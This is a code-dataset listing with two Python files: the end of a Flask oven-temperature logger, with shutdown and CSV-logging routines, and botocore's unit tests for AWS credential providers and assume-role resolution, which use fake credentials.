note = ""
templateData = {
'title' : title,
'note' : note
}
return render_template('note.html', **templateData)
@app.route('/temp')
def temp():
now = datetime.datetime.now()
timeString = now.strftime("%H:%M on %d-%m-%Y")
# TODO: Consider what happens if the thread is updating the data at the same time as display
# Can a safe copy be made?
templateData = {
'title' : title,
'time': timeString,
'air' : air_temp,
'temps' : temps,
'units' : units.upper()
}
return render_template('oven.html', **templateData)
@app.route('/confirm')
def confirm():
templateData = {
'title' : title
}
return render_template('confirm.html', **templateData)
@app.route('/shutdown')
def shutdown():
command = "/usr/bin/sudo /sbin/shutdown +1"
import subprocess
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
output = process.communicate()[0]
print (output)
templateData = {
'title' : title
}
return render_template('shutdown.html', **templateData)
@app.route('/cancel')
def cancel():
command = "/usr/bin/sudo /sbin/shutdown -c"
import subprocess
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
output = process.communicate()[0]
print (output)
return index()
# Logging code: write a CSV file with header and then one set of sensor measurements per interval
class LogThread ( threading.Thread ):
def run ( self ):
global log_status
global dir
global log_interval
global cs_pins
global clock_pin
global data_pin
global units
global pending_note
now = datetime.datetime.now()
filetime = now.strftime("%Y-%m-%d-%H-%M")
filename=dir+'/logging/'+filetime+'_temperature_log.csv'
with open(filename, 'a') as csvfile:
logfile = csv.writer(csvfile, delimiter=',', quotechar='"')
row = ["Date-Time"]
for channels in temps:
row.append( temps[channels]['name'])
row.append("Age")
row.append("Notes")
logfile.writerow(row)
while log_status == "On":
with open(filename, 'a') as csvfile:
logfile = csv.writer(csvfile, delimiter=',', quotechar='"')
now = datetime.datetime.now()
row = [now.strftime("%d/%m/%Y %H:%M")]
for channel in temps:
row.append(temps[channel]['temperature'])
row.append(temps[channel]['age'])
if pending_note != "":
row.append(pending_note)
pending_note = ""
logfile.writerow(row)
time.sleep(log_interval)
log_status = "Off"
def flaskThread():
# Start webserver
app.run(debug=False, host='0.0.0.0', port=5000)
if __name__ == '__main__':
threading.Thread(target=flaskThread).start()
appREST.run(debug=False, host='0.0.0.0', port=5001)
|
test_credentials.py
|
# Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import uuid
import threading
import os
import math
import time
import tempfile
import shutil
from datetime import datetime, timedelta
import sys
from dateutil.tz import tzlocal
from botocore.exceptions import CredentialRetrievalError
from tests import mock, unittest, IntegerRefresher, BaseEnvVar, random_chars
from tests import temporary_file, StubbedSession, SessionHTTPStubber
from botocore import UNSIGNED
from botocore.credentials import EnvProvider, ContainerProvider
from botocore.credentials import InstanceMetadataProvider
from botocore.credentials import Credentials, ReadOnlyCredentials
from botocore.credentials import AssumeRoleProvider, ProfileProviderBuilder
from botocore.credentials import CanonicalNameCredentialSourcer
from botocore.credentials import DeferredRefreshableCredentials
from botocore.credentials import create_credential_resolver
from botocore.credentials import JSONFileCache
from botocore.config import Config
from botocore.session import Session
from botocore.exceptions import InvalidConfigError, InfiniteLoopConfigError
from botocore.stub import Stubber
from botocore.utils import datetime2timestamp
class TestCredentialRefreshRaces(unittest.TestCase):
def assert_consistent_credentials_seen(self, creds, func):
collected = []
self._run_threads(20, func, collected)
for creds in collected:
# During testing, the refresher uses it's current
# refresh count as the values for the access, secret, and
# token value. This means that at any given point in time,
# the credentials should be something like:
#
# ReadOnlyCredentials('1', '1', '1')
# ReadOnlyCredentials('2', '2', '2')
# ...
# ReadOnlyCredentials('30', '30', '30')
#
# This makes it really easy to verify we see a consistent
# set of credentials from the same time period. We just
# check if all the credential values are the same. If
# we ever see something like:
#
# ReadOnlyCredentials('1', '2', '1')
#
# We fail. This is because we're using the access_key
# from the first refresh ('1'), the secret key from
# the second refresh ('2'), and the token from the
# first refresh ('1').
self.assertTrue(creds[0] == creds[1] == creds[2], creds)
def assert_non_none_retrieved_credentials(self, func):
collected = []
self._run_threads(50, func, collected)
for cred in collected:
self.assertIsNotNone(cred)
def _run_threads(self, num_threads, func, collected):
threads = []
for _ in range(num_threads):
threads.append(threading.Thread(target=func, args=(collected,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def test_has_no_race_conditions(self):
creds = IntegerRefresher(
creds_last_for=2,
advisory_refresh=1,
mandatory_refresh=0
)
def _run_in_thread(collected):
for _ in range(4000):
frozen = creds.get_frozen_credentials()
collected.append((frozen.access_key,
frozen.secret_key,
frozen.token))
start = time.time()
self.assert_consistent_credentials_seen(creds, _run_in_thread)
end = time.time()
# creds_last_for = 2 seconds (from above)
# So, for example, if execution time took 6.1 seconds, then
# we should see a maximum number of refreshes being (6 / 2.0) + 1 = 4
max_calls_allowed = math.ceil((end - start) / 2.0) + 1
self.assertTrue(creds.refresh_counter <= max_calls_allowed,
"Too many cred refreshes, max: %s, actual: %s, "
"time_delta: %.4f" % (max_calls_allowed,
creds.refresh_counter,
(end - start)))
def test_no_race_for_immediate_advisory_expiration(self):
creds = IntegerRefresher(
creds_last_for=1,
advisory_refresh=1,
mandatory_refresh=0
)
def _run_in_thread(collected):
for _ in range(100):
frozen = creds.get_frozen_credentials()
collected.append((frozen.access_key,
frozen.secret_key,
frozen.token))
self.assert_consistent_credentials_seen(creds, _run_in_thread)
def test_no_race_for_initial_refresh_of_deferred_refreshable(self):
def get_credentials():
expiry_time = (
datetime.now(tzlocal()) + timedelta(hours=24)).isoformat()
return {
'access_key': 'my-access-key',
'secret_key': 'my-secret-key',
'token': 'my-token',
'expiry_time': expiry_time
}
deferred_creds = DeferredRefreshableCredentials(
get_credentials, 'fixed')
def _run_in_thread(collected):
frozen = deferred_creds.get_frozen_credentials()
collected.append(frozen)
self.assert_non_none_retrieved_credentials(_run_in_thread)
class BaseAssumeRoleTest(BaseEnvVar):
def setUp(self):
super(BaseAssumeRoleTest, self).setUp()
self.tempdir = tempfile.mkdtemp()
self.config_file = os.path.join(self.tempdir, 'config')
self.environ['AWS_CONFIG_FILE'] = self.config_file
self.environ['AWS_SHARED_CREDENTIALS_FILE'] = str(uuid.uuid4())
def tearDown(self):
shutil.rmtree(self.tempdir)
super(BaseAssumeRoleTest, self).tearDown()
def some_future_time(self):
timeobj = datetime.now(tzlocal())
return timeobj + timedelta(hours=24)
def create_assume_role_response(self, credentials, expiration=None):
if expiration is None:
expiration = self.some_future_time()
response = {
'Credentials': {
'AccessKeyId': credentials.access_key,
'SecretAccessKey': credentials.secret_key,
'SessionToken': credentials.token,
'Expiration': expiration
},
'AssumedRoleUser': {
'AssumedRoleId': 'myroleid',
'Arn': 'arn:aws:iam::1234567890:user/myuser'
}
}
return response
def create_random_credentials(self):
return Credentials(
'fake-%s' % random_chars(15),
'fake-%s' % random_chars(35),
'fake-%s' % random_chars(45)
)
def assert_creds_equal(self, c1, c2):
c1_frozen = c1
if not isinstance(c1_frozen, ReadOnlyCredentials):
c1_frozen = c1.get_frozen_credentials()
c2_frozen = c2
if not isinstance(c2_frozen, ReadOnlyCredentials):
c2_frozen = c2.get_frozen_credentials()
self.assertEqual(c1_frozen, c2_frozen)
def write_config(self, config):
with open(self.config_file, 'w') as f:
f.write(config)
class TestAssumeRole(BaseAssumeRoleTest):
def setUp(self):
super(TestAssumeRole, self).setUp()
self.environ['AWS_ACCESS_KEY_ID'] = 'access_key'
self.environ['AWS_SECRET_ACCESS_KEY'] = 'secret_key'
self.metadata_provider = self.mock_provider(InstanceMetadataProvider)
self.env_provider = self.mock_provider(EnvProvider)
self.container_provider = self.mock_provider(ContainerProvider)
self.mock_client_creator = mock.Mock(spec=Session.create_client)
self.actual_client_region = None
current_dir = os.path.dirname(os.path.abspath(__file__))
credential_process = os.path.join(
current_dir, 'utils', 'credentialprocess.py'
)
self.credential_process = '%s %s' % (
sys.executable, credential_process
)
def mock_provider(self, provider_cls):
mock_instance = mock.Mock(spec=provider_cls)
mock_instance.load.return_value = None
mock_instance.METHOD = provider_cls.METHOD
mock_instance.CANONICAL_NAME = provider_cls.CANONICAL_NAME
return mock_instance
def create_session(self, profile=None):
session = StubbedSession(profile=profile)
# We have to set bogus credentials here or otherwise we'll trigger
# an early credential chain resolution.
sts = session.create_client(
'sts',
aws_access_key_id='spam',
aws_secret_access_key='eggs',
)
self.mock_client_creator.return_value = sts
assume_role_provider = AssumeRoleProvider(
load_config=lambda: session.full_config,
client_creator=self.mock_client_creator,
cache={},
profile_name=profile,
credential_sourcer=CanonicalNameCredentialSourcer([
self.env_provider, self.container_provider,
self.metadata_provider
]),
profile_provider_builder=ProfileProviderBuilder(
session,
sso_token_cache=JSONFileCache(self.tempdir),
),
)
stubber = session.stub('sts')
stubber.activate()
component_name = 'credential_provider'
resolver = session.get_component(component_name)
available_methods = [p.METHOD for p in resolver.providers]
replacements = {
'env': self.env_provider,
'iam-role': self.metadata_provider,
'container-role': self.container_provider,
'assume-role': assume_role_provider
}
for name, provider in replacements.items():
try:
index = available_methods.index(name)
except ValueError:
# The provider isn't in the session
continue
resolver.providers[index] = provider
session.register_component(
'credential_provider', resolver
)
return session, stubber
def test_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def test_environment_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Environment\n'
)
self.write_config(config)
environment_creds = self.create_random_credentials()
self.env_provider.load.return_value = environment_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.env_provider.load.call_count, 1)
def test_instance_metadata_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Ec2InstanceMetadata\n'
)
self.write_config(config)
metadata_creds = self.create_random_credentials()
self.metadata_provider.load.return_value = metadata_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.metadata_provider.load.call_count, 1)
def test_container_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = EcsContainer\n'
)
self.write_config(config)
container_creds = self.create_random_credentials()
self.container_provider.load.return_value = container_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.container_provider.load.call_count, 1)
def test_invalid_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = CustomInvalidProvider\n'
)
self.write_config(config)
with self.assertRaises(InvalidConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials()
def test_misconfigured_source_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'region = us-west-2\n'
)
self.write_config(config)
with self.assertRaises(InvalidConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials().get_frozen_credentials()
def test_recursive_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'source_profile = C\n\n'
'[profile C]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
profile_b_creds = self.create_random_credentials()
profile_b_response = self.create_assume_role_response(profile_b_creds)
profile_a_creds = self.create_random_credentials()
profile_a_response = self.create_assume_role_response(profile_a_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', profile_b_response)
stubber.add_response('assume_role', profile_a_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, profile_a_creds)
stubber.assert_no_pending_responses()
def test_recursive_assume_role_stops_at_static_creds(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'source_profile = C\n\n'
'[profile C]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
profile_a_creds = self.create_random_credentials()
profile_a_response = self.create_assume_role_response(profile_a_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', profile_a_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, profile_a_creds)
stubber.assert_no_pending_responses()
def test_infinitely_recursive_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = A\n'
)
self.write_config(config)
with self.assertRaises(InfiniteLoopConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials()
def test_process_source_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'credential_process = %s\n' % self.credential_process
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
# Assert that the client was created with the credentials from the
# credential process.
self.assertEqual(self.mock_client_creator.call_count, 1)
_, kwargs = self.mock_client_creator.call_args_list[0]
expected_kwargs = {
'aws_access_key_id': 'spam',
'aws_secret_access_key': 'eggs',
'aws_session_token': None,
}
self.assertEqual(kwargs, expected_kwargs)
def test_web_identity_source_profile(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'role_arn = arn:aws:iam::123456789:role/RoleB\n'
'web_identity_token_file = %s\n' % token_path
)
self.write_config(config)
session, stubber = self.create_session(profile='A')
identity_creds = self.create_random_credentials()
identity_response = self.create_assume_role_response(identity_creds)
stubber.add_response(
'assume_role_with_web_identity',
identity_response,
)
expected_creds = self.create_random_credentials()
assume_role_response = self.create_assume_role_response(expected_creds)
stubber.add_response('assume_role', assume_role_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
# Assert that the client was created with the credentials from the
# assume role with web identity call.
self.assertEqual(self.mock_client_creator.call_count, 1)
_, kwargs = self.mock_client_creator.call_args_list[0]
expected_kwargs = {
'aws_access_key_id': identity_creds.access_key,
'aws_secret_access_key': identity_creds.secret_key,
'aws_session_token': identity_creds.token,
}
self.assertEqual(kwargs, expected_kwargs)
def test_web_identity_source_profile_ignores_env_vars(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'web_identity_token_file = %s\n' % token_path
)
self.write_config(config)
session, _ = self.create_session(profile='A')
# The config is split between the profile and the env, we
# should only be looking at the profile so this should raise
# a configuration error.
with self.assertRaises(InvalidConfigError):
session.get_credentials()
def test_sso_source_profile(self):
token_cache_key = 'f395038c92f1828cbb3991d2d6152d326b895606'
cached_token = {
'accessToken': 'a.token',
'expiresAt': self.some_future_time(),
}
temp_cache = JSONFileCache(self.tempdir)
temp_cache[token_cache_key] = cached_token
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'sso_region = us-east-1\n'
'sso_start_url = https://test.url/start\n'
'sso_role_name = SSORole\n'
'sso_account_id = 1234567890\n'
)
self.write_config(config)
session, sts_stubber = self.create_session(profile='A')
client_config = Config(
region_name='us-east-1',
signature_version=UNSIGNED,
)
sso_stubber = session.stub('sso', config=client_config)
sso_stubber.activate()
# The expiration needs to be in milliseconds
expiration = datetime2timestamp(self.some_future_time()) * 1000
sso_role_creds = self.create_random_credentials()
sso_role_response = {
'roleCredentials': {
'accessKeyId': sso_role_creds.access_key,
'secretAccessKey': sso_role_creds.secret_key,
'sessionToken': sso_role_creds.token,
'expiration': int(expiration),
}
}
sso_stubber.add_response('get_role_credentials', sso_role_response)
expected_creds = self.create_random_credentials()
assume_role_response = self.create_assume_role_response(expected_creds)
sts_stubber.add_response('assume_role', assume_role_response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
sts_stubber.assert_no_pending_responses()
# Assert that the client was created with the credentials from the
# SSO get role credentials response
self.assertEqual(self.mock_client_creator.call_count, 1)
_, kwargs = self.mock_client_creator.call_args_list[0]
expected_kwargs = {
'aws_access_key_id': sso_role_creds.access_key,
'aws_secret_access_key': sso_role_creds.secret_key,
'aws_session_token': sso_role_creds.token,
}
self.assertEqual(kwargs, expected_kwargs)
def test_web_identity_credential_source_ignores_env_vars(self):
token_path = os.path.join(self.tempdir, 'token')
with open(token_path, 'w') as token_file:
token_file.write('a.token')
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = token_path
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Environment\n'
)
self.write_config(config)
session, _ = self.create_session(profile='A')
# We should not get credentials from web-identity configured in the
# environment when the Environment credential_source is set.
# There are no Environment credentials, so this should raise a
# retrieval error.
with self.assertRaises(CredentialRetrievalError):
session.get_credentials()
def test_self_referential_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = A\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def create_stubbed_sts_client(self, session):
expected_creds = self.create_random_credentials()
_original_create_client = session.create_client
def create_client_sts_stub(service, *args, **kwargs):
client = _original_create_client(service, *args, **kwargs)
stub = Stubber(client)
response = self.create_assume_role_response(expected_creds)
self.actual_client_region = client.meta.region_name
stub.add_response('assume_role', response)
stub.activate()
return client
return create_client_sts_stub, expected_creds
def test_assume_role_uses_correct_region(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
session = Session(profile='A')
# Verify that when we configure the session with a specific region
# that we use that region when creating the sts client.
session.set_config_variable('region', 'cn-north-1')
create_client, expected_creds = self.create_stubbed_sts_client(session)
session.create_client = create_client
resolver = create_credential_resolver(session)
provider = resolver.get_provider('assume-role')
creds = provider.load()
self.assert_creds_equal(creds, expected_creds)
self.assertEqual(self.actual_client_region, 'cn-north-1')
class TestAssumeRoleWithWebIdentity(BaseAssumeRoleTest):
def setUp(self):
super(TestAssumeRoleWithWebIdentity, self).setUp()
self.token_file = os.path.join(self.tempdir, 'token.jwt')
self.write_token('totally.a.token')
def write_token(self, token, path=None):
if path is None:
path = self.token_file
with open(path, 'w') as f:
f.write(token)
def assert_session_credentials(self, expected_params, **kwargs):
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session = StubbedSession(**kwargs)
stubber = session.stub('sts')
stubber.add_response(
'assume_role_with_web_identity',
response,
expected_params
)
stubber.activate()
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def test_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'role_session_name = sname\n'
'web_identity_token_file = %s\n'
) % self.token_file
self.write_config(config)
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleA',
'RoleSessionName': 'sname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params, profile='A')
def test_assume_role_env_vars(self):
config = (
'[profile B]\n'
'region = us-west-2\n'
)
self.write_config(config)
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleB'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = self.token_file
self.environ['AWS_ROLE_SESSION_NAME'] = 'bname'
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleB',
'RoleSessionName': 'bname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params)
def test_assume_role_env_vars_do_not_take_precedence(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'role_session_name = aname\n'
'web_identity_token_file = %s\n'
) % self.token_file
self.write_config(config)
different_token = os.path.join(self.tempdir, str(uuid.uuid4()))
self.write_token('totally.different.token', path=different_token)
self.environ['AWS_ROLE_ARN'] = 'arn:aws:iam::123456789:role/RoleC'
self.environ['AWS_WEB_IDENTITY_TOKEN_FILE'] = different_token
self.environ['AWS_ROLE_SESSION_NAME'] = 'cname'
expected_params = {
'RoleArn': 'arn:aws:iam::123456789:role/RoleA',
'RoleSessionName': 'aname',
'WebIdentityToken': 'totally.a.token',
}
self.assert_session_credentials(expected_params, profile='A')
class TestProcessProvider(unittest.TestCase):
def setUp(self):
current_dir = os.path.dirname(os.path.abspath(__file__))
credential_process = os.path.join(
current_dir, 'utils', 'credentialprocess.py'
)
self.credential_process = '%s %s' % (
sys.executable, credential_process
)
self.environ = os.environ.copy()
self.environ_patch = mock.patch('os.environ', self.environ)
self.environ_patch.start()
def tearDown(self):
self.environ_patch.stop()
def test_credential_process(self):
config = (
'[profile processcreds]\n'
'credential_process = %s\n'
)
config = config % self.credential_process
with temporary_file('w') as f:
f.write(config)
f.flush()
self.environ['AWS_CONFIG_FILE'] = f.name
credentials = Session(profile='processcreds').get_credentials()
self.assertEqual(credentials.access_key, 'spam')
self.assertEqual(credentials.secret_key, 'eggs')
def test_credential_process_returns_error(self):
config = (
'[profile processcreds]\n'
'credential_process = %s --raise-error\n'
)
config = config % self.credential_process
with temporary_file('w') as f:
f.write(config)
f.flush()
self.environ['AWS_CONFIG_FILE'] = f.name
session = Session(profile='processcreds')
# This regex validates that there is no substring: b'
# The reason why we want to validate that is that we want to
# make sure that stderr is actually decoded so that in
# exceptional cases the error is properly formatted.
# As for how the regex works:
# `(?!b').` is a negative lookahead, meaning that it will only
# match if it is not followed by the pattern `b'`. Since it is
# followed by a `.` it will match any character not followed by
# that pattern. `((?!hede).)*` does that zero or more times. The
# final pattern adds `^` and `$` to anchor the beginning and end
# of the string so we can know the whole string is consumed.
# Finally `(?s)` at the beginning makes dots match newlines so
# we can handle a multi-line string.
reg = r"(?s)^((?!b').)*$"
with self.assertRaisesRegex(CredentialRetrievalError, reg):
session.get_credentials()
class TestSTSRegional(BaseAssumeRoleTest):
def add_assume_role_http_response(self, stubber):
stubber.add_response(
body=self._get_assume_role_body('AssumeRole'))
def add_assume_role_with_web_identity_http_response(self, stubber):
stubber.add_response(
body=self._get_assume_role_body('AssumeRoleWithWebIdentity'))
def _get_assume_role_body(self, method_name):
expiration = self.some_future_time()
body = (
'<{method_name}Response>'
' <{method_name}Result>'
' <AssumedRoleUser>'
' <Arn>arn:aws:sts::0123456:user</Arn>'
' <AssumedRoleId>AKID:mysession-1567020004</AssumedRoleId>'
' </AssumedRoleUser>'
' <Credentials>'
' <AccessKeyId>AccessKey</AccessKeyId>'
' <SecretAccessKey>SecretKey</SecretAccessKey>'
' <SessionToken>SessionToken</SessionToken>'
' <Expiration>{expiration}</Expiration>'
' </Credentials>'
' </{method_name}Result>'
'</{method_name}Response>'
).format(method_name=method_name, expiration=expiration)
return body.encode('utf-8')
def make_stubbed_client_call_to_region(self, session, stubber, region):
ec2 = session.create_client('ec2', region_name=region)
stubber.add_response(body=b'<DescribeRegionsResponse/>')
ec2.describe_regions()
def test_assume_role_uses_same_region_as_client(self):
config = (
'[profile A]\n'
'sts_regional_endpoints = regional\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
session = Session(profile='A')
with SessionHTTPStubber(session) as stubber:
self.add_assume_role_http_response(stubber)
# Make an arbitrary client and API call as we are really only
# looking to make sure the STS assume role call uses the correct
# endpoint.
self.make_stubbed_client_call_to_region(
session, stubber, 'us-west-2')
self.assertEqual(
stubber.requests[0].url,
'https://sts.us-west-2.amazonaws.com/'
)
def test_assume_role_web_identity_uses_same_region_as_client(self):
token_file = os.path.join(self.tempdir, 'token.jwt')
with open(token_file, 'w') as f:
f.write('some-token')
config = (
'[profile A]\n'
'sts_regional_endpoints = regional\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'web_identity_token_file = %s\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n' % token_file
)
self.write_config(config)
# Make an arbitrary client and API call as we are really only
# looking to make sure the STS assume role call uses the correct
# endpoint.
session = Session(profile='A')
with SessionHTTPStubber(session) as stubber:
self.add_assume_role_with_web_identity_http_response(stubber)
# Make an arbitrary client and API call as we are really only
# looking to make sure the STS assume role call uses the correct
# endpoint.
self.make_stubbed_client_call_to_region(
session, stubber, 'us-west-2')
self.assertEqual(
stubber.requests[0].url,
'https://sts.us-west-2.amazonaws.com/'
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.